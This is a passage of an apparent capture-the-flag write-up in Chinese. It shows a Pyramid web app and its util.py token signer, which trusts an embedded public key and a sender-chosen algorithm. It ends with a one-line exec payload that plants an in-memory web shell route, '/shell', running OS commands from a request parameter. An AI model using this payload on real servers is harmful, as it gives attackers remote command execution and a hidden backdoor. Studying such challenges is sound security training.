        config.add_route('register_api', '/api/register')
        config.add_route('system_test', '/api/test')
        config.add_route('front_test', '/test')
        config.add_view(system_test, route_name='system_test')
        config.add_view(front_test, route_name='front_test')
        config.add_view(register_api, route_name='register_api')
        config.add_view(register_front, route_name='register_front')
        app = config.make_wsgi_app()

    server = make_server('0.0.0.0', 6543, app)
    server.serve_forever()

util.py

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
import base64
import json
import uuid
from Crypto.PublicKey import RSA
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256

import hashlib

secret = str(uuid.uuid4())


def generate_keys():
    key = RSA.generate(2048)
    private_key = key.export_key()
    public_key = key.publickey().export_key()
    return private_key, public_key




def sign_data(private_key, data):
    rsakey = RSA.import_key(private_key)
    # 将JSON数据转换为字符串
    data_str = json.dumps(data)
    hash_obj = SHA256.new(data_str.encode('utf-8'))
    signature = pkcs1_15.new(rsakey).sign(hash_obj)
    return signature


def verify_signature(secret, data, signature, alg):
    if alg == 'RS':
        rsakey = RSA.import_key(secret)
        # 将JSON数据转换为字符串
        data_str = json.dumps(data)
        hash_obj = SHA256.new(data_str.encode('utf-8'))
        try:
            pkcs1_15.new(rsakey).verify(hash_obj, signature)
            print("Signature is valid. Transmitted data:", data)
            return True
        except (ValueError, TypeError):
            print("Signature is invalid.")
            return False
    elif alg == 'HS':
        hash_object = hashlib.sha256()
        data_bytes = (json.dumps(data) + secret.decode()).encode('utf-8')
        print(data_bytes)
        hash_object.update(data_bytes)
        hex_dig = hash_object.hexdigest()
        if hex_dig == signature.decode():
            return True
    else:
        return False


def data_encode(data, alg):
    if alg not in ['HS', 'RS']:
        raise "Algorithm must be HS or RS!"
    else:
        private_key, public_key = generate_keys()
        if alg == 'RS':
            signature = sign_data(private_key, data)
            data_bytes = json.dumps(data).encode('utf-8')
            encoded_data1 = base64.b64encode(data_bytes)  # data
            encoded_data2 = base64.b64encode(signature)  # signature
            print(encoded_data2)
            encoded_data3 = base64.b64encode(alg.encode('utf-8'))  # alg
            encoded_data4 = base64.b64encode(public_key)  # public_key
            encoded_data = encoded_data1.decode() + '.' + encoded_data2.decode() + '.' + encoded_data3.decode() + '.' + encoded_data4.decode()
            print("The encoded data is: ", encoded_data)
            return encoded_data
        else:
            hash_object = hashlib.sha256()
            data_bytes = (json.dumps(data) + secret).encode('utf-8')
            inputdata = json.dumps(data).encode('utf-8')
            hash_object.update(data_bytes)
            hex_dig = hash_object.hexdigest()
            signature = base64.b64encode(hex_dig.encode('utf-8'))
            encoded_data1 = base64.b64encode(inputdata)  # data
            encoded_data3 = base64.b64encode(alg.encode('utf-8'))  # alg
            encoded_data = encoded_data1.decode() + '.' + signature.decode() + '.' + encoded_data3.decode()
            print("The encoded data is: ", encoded_data)
            return encoded_data


def data_decode(encode_data):
    try:
        all_data = encode_data.split('.')
        sig_bytes = all_data[1].replace(' ', '+').encode('utf-8')
        print(sig_bytes)
        data = base64.b64decode(all_data[0].replace(' ', '+')).decode('utf-8')
        json_data = json.loads(data)
        signature = base64.b64decode(sig_bytes)
        alg = base64.b64decode(all_data[2]).decode('utf-8')
        key = secret
        if len(all_data) == 4:
            key_bytes = all_data[3].replace(' ', '+').encode('utf-8')
            key = base64.b64decode(key_bytes)  # bytes
        # 验证签名
        is_valid = verify_signature(key, json_data, signature, alg)
        if is_valid:
            return json_data
        else:
            return False
    except:
        raise "something error"


def read_html(filname):
    with open('./static/' + filname, 'r', encoding='utf-8') as file:
        # 读取文件内容
        html_content = file.read()
    return html_content

上面一题由于config是局部变量获取不了,这题可以了

直接上内存马payload

1
exec("import sys;config = sys.modules['__main__'].config;app=sys.modules['__main__'].app;print(config);config.add_route('shell', '/shell');config.add_view(lambda request: Response(__import__('os').popen(request.params.get('1')).read()),route_name='shell');app = config.make_wsgi_app()")
使用 Hugo 构建
主题 StackJimmy 设计